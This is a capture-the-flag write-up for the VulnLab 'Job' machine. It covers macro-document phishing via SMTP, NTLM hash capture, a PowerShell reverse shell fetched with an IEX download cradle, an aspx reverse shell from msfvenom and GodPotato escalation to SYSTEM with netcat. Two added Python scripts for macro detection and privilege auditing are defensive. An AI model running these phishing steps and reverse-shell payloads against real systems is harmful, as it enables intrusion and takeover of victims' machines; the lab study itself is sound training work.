vulnlab-job

From Phishing to admin
Enrique A.
Tools used: sendemail, msfconsole, msfvenom, GodPotato

nmap scan

PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-28T14:15:50+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: JOB
|   NetBIOS_Domain_Name: JOB
|   NetBIOS_Computer_Name: JOB
|   DNS_Domain_Name: job
|   DNS_Computer_Name: job
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-28T14:15:10+00:00
| ssl-cert: Subject: commonName=job
| Not valid before: 2024-06-27T12:41:55
|_Not valid after:  2024-12-27T12:41:55
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-06-28T14:15:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds

 

cat /etc/hosts | grep job
10.10.114.36 job.local

The website shows one email address: career@job.local

It also states that if you send your resume, it should be a LibreOffice document.

Phishing, try 1: getting some Windows hashes

First, generate the bad ODT with msf:

use auxiliary/fileformat/odt_badodt
set LHOST tun0
run

Then send a mail with it attached and catch the hashes that come back:

sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey http://10.8.2.138/test" -a bad.odt 
Jun 21 15:46:10 kali sendemail[162513]: Email was sent successfully!
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.99.156,51049)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] jack.black::JOB:aaaaaaaaaaaaaaaa:9b4c1be9c604bc2f1fdd46f203c4c1b3:010100000000000080f42a66e1c3da016f7c8cc4409768a80000000001001000640069004c004900700078006a00770003001000640069004c004900700078006a007700020010005500480078006a00430067004b007700040010005500480078006a00430067004b0077000700080080f42a66e1c3da0106000400020000000800300030000000000000000000000000200000f3afad144322c33a39d814751dfc312d1dd988dd18fbcedeab107cb49d9d84730a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.99.156,51049)
[*] Remaining connections []
[*] Incoming connection (10.10.99.156,51050)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] 

The hash could not be cracked with john and rockyou.txt.

So phishing with a macro document seems to be the way to go. This is what I did.

The following write-up provides a very good example on how to do this:

https://0xdf.gitlab.io/2020/02/01/htb-re.html

msf6 > set payload windows/x64/exec
payload => windows/x64/exec
msf6 > set LHOST 10.8.2.138
LHOST => 10.8.2.138
msf6 > set LPORT 80
LPORT => 80
msf6 > set cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');"
cmd => powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');

shell.txt

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cat shell.txt
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
# Setup IPADDR
$address = '10.8.2.138'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

 

 

msf6 exploit(multi/misc/openoffice_document_macro) > show options

Module options (exploit/multi/misc/openoffice_document_macro):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BODY                       no        The message for the document body
   FILENAME  msf.odt          yes       The OpenOffice Text document name
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                         local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


Payload options (windows/x64/exec):

   Name      Current Setting                         Required  Description
   ----      ---------------                         --------  -----------
   CMD       powershell.exe -nop -w hidden -ep bypa  yes       The command string to execute
             ss -c IEX(New-Object Net.WebClient).Do
             wnloadString('http://10.8.2.138/shell.
             txt');
   EXITFUNC  thread                                  yes       Exit technique (Accepted: '', seh, thread, process, none)


Exploit target:

   Id  Name
   --  ----
   0   Apache OpenOffice on Windows (PSH)



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/openoffice_document_macro) > set srvport 80
srvport => 80
msf6 exploit(multi/misc/openoffice_document_macro) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) > 
[*] Using URL: http://10.8.2.138/7Jnb1x3
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /home/puck/.msf4/local/msf.odt
exit
[*] Server stopped.
[*] Server stopped.

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cp /home/puck/.msf4/local/msf.odt .
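The packaging log above shows what makes the document dangerous: a Basic/ library tree (script-lc.xml, Standard/script-lb.xml, Standard/Module1.xml) registered in META-INF/manifest.xml. Since an ODT is just a zip archive, a mail gateway or triage script can check for exactly that before a user opens the attachment. The scanner below is an added example, not code from the write-up or from Metasploit; the documents it scans are constructed in memory, and the manifest media type used for the Basic/ entry is an assumption made for the sample.

```python
"""Flag OpenDocument attachments that carry embedded Basic macros.

Added example; not code from the original write-up or from Metasploit.
An ODT is a zip archive. A macro-bearing document ships a Basic/ library
tree and declares it in META-INF/manifest.xml; either signal is enough to
quarantine the file. The documents scanned below are constructed samples.
"""
import io
import re
import zipfile

# Archive members that hold macro code in ODF packages (Basic/ for StarBasic,
# Scripts/ for Python/BeanShell/JavaScript libraries).
MACRO_MEMBER_RE = re.compile(r"^(Basic|Scripts)/", re.IGNORECASE)
# Manifest entries that register a macro library with the office suite.
MANIFEST_MACRO_RE = re.compile(r'manifest:full-path="(Basic|Scripts)/', re.IGNORECASE)


def scan_odt(data):
    """Return a verdict dict for one document given as bytes.

    has_macros is True/False for a parseable archive and None when the bytes
    are not a zip at all (a corrupt or disguised file), which a gateway should
    treat as quarantine-worthy rather than clean.
    """
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"mimetype": None, "macro_members": [],
                "manifest_declares_macros": False, "has_macros": None}
    names = zf.namelist()
    macro_members = sorted(n for n in names if MACRO_MEMBER_RE.match(n))
    manifest = ""
    if "META-INF/manifest.xml" in names:
        manifest = zf.read("META-INF/manifest.xml").decode("utf-8", "replace")
    mimetype = None
    if "mimetype" in names:
        mimetype = zf.read("mimetype").decode("ascii", "replace").strip()
    declared = MANIFEST_MACRO_RE.search(manifest) is not None
    return {
        "mimetype": mimetype,
        "macro_members": macro_members,
        "manifest_declares_macros": declared,
        # A library can be present without a manifest entry after tampering,
        # and a manifest entry without files is still suspicious: flag either.
        "has_macros": bool(macro_members) or declared,
    }


def build_sample_odt(with_macro):
    """Build a minimal ODT in memory (constructed sample data, not a real CV)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # ODF requires the 'mimetype' member first and stored uncompressed.
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text",
                    compress_type=zipfile.ZIP_STORED)
        zf.writestr("content.xml", "<office:document-content/>")
        entries = [
            '<manifest:file-entry manifest:full-path="/" manifest:media-type="application/vnd.oasis.opendocument.text"/>',
            '<manifest:file-entry manifest:full-path="content.xml" manifest:media-type="text/xml"/>',
        ]
        if with_macro:
            zf.writestr("Basic/script-lc.xml", "<library:libraries/>")
            zf.writestr("Basic/Standard/script-lb.xml", "<library:library/>")
            zf.writestr("Basic/Standard/Module1.xml", "<script:module>Sub Main\nEnd Sub</script:module>")
            # Media type for the library entry is an assumption made for this sample.
            entries.append('<manifest:file-entry manifest:full-path="Basic/" manifest:media-type="application/binary"/>')
        zf.writestr("META-INF/manifest.xml",
                    "<manifest:manifest>" + "".join(entries) + "</manifest:manifest>")
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("clean", build_sample_odt(False)), ("macro", build_sample_odt(True))):
        print(label, scan_odt(doc))
```

Run it on a real attachment with `scan_odt(open("resume.odt", "rb").read())`; a verdict of `None` (not a zip at all) deserves the same quarantine as `True`, since a file claiming to be an ODT that is not a valid package is itself a red flag.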

Now the malicious ODT is opened on the target and its macro requests the URL:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:05:37] "GET /7Jnb1x3 HTTP/1.1" 200 -


┌──(puck㉿kali)-[~/vulnlab/job]
└─$ sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a msf.odt
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rm 7Jnb1x3
└─$ cp shell.txt 7Jnb1x3


Run it again; the URL the macro fetches now serves shell.txt:
sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138>
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

Now the shell script is downloaded:
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:02:57] "GET /7Jnb1x3 HTTP/1.1" 200 -
10.10.114.36 - - [28/Jun/2024 10:04:02] "GET /7Jnb1x3 HTTP/1.1" 200 -


And we catch the shell as the user jack.black:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rlwrap nc -nlvp 443                  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 52139
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
job\jack.black

c:\Users\jack.black\Desktop>type user.txt
VL{0fa1<REDACTED>5dc1}
PS C:\inetpub\wwwroot> dir


    Directory: C:\inetpub\wwwroot


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----        11/10/2021   8:52 PM                aspnet_client                                                        
d-----         11/9/2021   9:24 PM                assets                                                               
d-----         11/9/2021   9:24 PM                css                                                                  
d-----         11/9/2021   9:24 PM                js                                                                   
-a----        11/10/2021   9:01 PM            298 hello.aspx                                                           
-a----         11/7/2021   1:05 PM           3261 index.html                                                           


PS C:\inetpub\wwwroot> curl http://10.8.2.138/cmdasp.aspx -o cmdasp.aspx
PS C:\inetpub\wwwroot> curl http://10.8.2.138/reverse.aspx -o reverse.aspx

 

Privesc

After checking the files and folders on this machine, I noticed that C:\inetpub\wwwroot is writable, so we can upload files to the website.

I created an aspx reverse shell with:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.2.138 LPORT=9001 -f aspx > reverse.aspx

and then requested it with curl http://job.local/reverse.aspx to get a new shell:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53689
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140720521084928
[*] DispatchTable: 0x140720523675512
[*] UseProtseqFunction: 0x140720522968944
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\a0c54595-80de-4e4f-a985-93a2101db089\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b002-0854-ffff-ad4d-dae1b390a835
[*] DCOM obj OXID: 0x7374a001401060e1
[*] DCOM obj OID: 0x734f5c52566383ce
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 988 Token:0x732  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3552

SeImpersonatePrivilege is enabled for the app pool account, so we used GodPotato (gp.exe) to run nc64.exe as SYSTEM, and we have an admin shell:

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 443  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53837
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{0102<REDACTED>5152}
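The escalation above worked only because the app pool identity holds SeImpersonatePrivilege. After finding a web shell that runs as an app pool, the first thing a responder checks is which token privileges that identity holds. The audit below is an added example, not code from the write-up or from GodPotato: it parses the table printed by `whoami /priv` and reports the privileges the potato family relies on. The listing it parses is constructed to mirror the real command's layout, not captured from the lab box.

```python
"""Audit a `whoami /priv` listing for token-impersonation privileges.

Added example; not code from the original write-up or from GodPotato.
The sample listing is constructed to mirror the real command's table layout.
"""

# Privileges that let a service account obtain a SYSTEM token via the
# potato family of techniques (well-known Windows privilege names).
IMPERSONATION_PRIVILEGES = {
    "SeImpersonatePrivilege": "Impersonate a client after authentication",
    "SeAssignPrimaryTokenPrivilege": "Replace a process level token",
}

# Constructed sample of `whoami /priv` output for an IIS app pool identity.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: state} from the table that follows the '====' rule."""
    rows = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("====="):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        # First column is the privilege name, last column its state; the
        # description in between may contain spaces.
        rows[parts[0]] = parts[-1]
    return rows


def held_impersonation_privileges(text):
    """Return {name: state} for every watch-list privilege the token holds.

    'Disabled' still means the token holds the privilege: the process can
    enable it with AdjustTokenPrivileges, so it is reported, not ignored.
    """
    privs = parse_whoami_priv(text)
    return {name: state for name, state in privs.items() if name in IMPERSONATION_PRIVILEGES}


def escalation_risk(text):
    """True when any watch-list privilege is held, whether enabled or not."""
    return bool(held_impersonation_privileges(text))


if __name__ == "__main__":
    for name, state in held_impersonation_privileges(SAMPLE_WHOAMI_PRIV).items():
        print(f"{name:32s} {state:10s} {IMPERSONATION_PRIVILEGES[name]}")
    print("escalation risk:", escalation_risk(SAMPLE_WHOAMI_PRIV))
```

Feed it the saved output of `whoami /priv` from the account in question; a non-empty result means a web shell on that host is one step from SYSTEM, which is the finding to escalate first when triaging the writable wwwroot.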

 

That's all.
We now have an Admin reverse shell.

 
